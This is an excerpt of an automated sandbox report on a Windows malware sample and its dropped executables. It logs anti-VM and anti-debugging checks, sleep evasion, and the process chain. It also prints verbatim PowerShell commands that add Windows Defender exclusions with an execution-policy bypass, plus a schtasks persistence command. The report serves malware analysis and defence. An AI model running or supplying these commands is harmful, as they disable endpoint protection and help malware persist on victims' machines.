                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595437s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595218s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595109s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -595000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594890s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594781s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594672s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594562s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -594450s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 7073 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 2531 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 7747 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 1897 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 6372Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 1552Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXE TID: 2500Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 5176Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 5404Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Roaming\Update.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exe TID: 7448Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Program Files\Windows Mail\System.exeLast function: Thread delayed
                                    Source: C:\Program Files\Windows Mail\System.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Update.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,24_2_00C6A69B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,24_2_00C7C220
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8B348 FindFirstFileExA,24_2_00C8B348
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7E6A3 VirtualQuery,GetSystemInfo,24_2_00C7E6A3
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599540Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599204Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598422Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598297Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598187Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597421Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597311Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597134Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597031Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596884Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596760Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596436Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596312Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596200Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596092Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595764Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595547Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595218Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595109Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594890Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594781Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594672Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594562Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594450Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\AppData
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: rqbprm.exe, 00000018.00000003.2094512247.0000000002F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\x
                                    Source: portBrowserweb.exe, 00000021.00000002.2688477004.000000001B91A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: wscript.exe, 0000001B.00000003.2338038912.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: portBrowserweb.exe, 00000021.00000002.2674990748.000000001B260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: HaLCYOFjMN.exeBinary or memory string: vmware
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                                    Source: System.exe.33.drBinary or memory string: Nk17AyvmcI
                                    Source: wscript.exe, 0000001B.00000003.2338038912.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: svchost.exe, 0000001C.00000002.2729863986.0000027FE3A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2732224060.0000027FE904C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDefi
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeAPI call chain: ExitProcess graph end nodegraph_24-25153
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC4777C1 CheckRemoteDebuggerPresent,5_2_00007FFAAC4777C1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00C7F838
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C87DEE mov eax, dword ptr fs:[00000030h]24_2_00C87DEE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8C030 GetProcessHeap,24_2_00C8C030
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Roaming\Update.exeProcess token adjusted: Debug
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows Mail\System.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows Mail\System.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00C7F838
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F9D5 SetUnhandledExceptionFilter,24_2_00C7F9D5
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_00C7FBCA
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00C88EBD
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'Jump to behavior
                                    Bypasses PowerShell execution policy
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\rqbprm.exe "C:\Users\user\AppData\Local\Temp\rqbprm.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE "C:\Users\user\AppData\Local\Temp\cnvwov.EXE" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentwebreviewDhcp\portBrowserweb.exe "C:\agentwebreviewDhcp/portBrowserweb.exe"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeProcess created: unknown unknown
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow

                                    Language, Device and Operating System Detection

                                    barindex
                                    Yara detected Telegram Recon
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7F654 cpuid 24_2_00C7F654
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: GetLocaleInfoW,GetNumberFormatW,24_2_00C7AF0F
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeQueries volume information: C:\Users\user\Desktop\HaLCYOFjMN.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
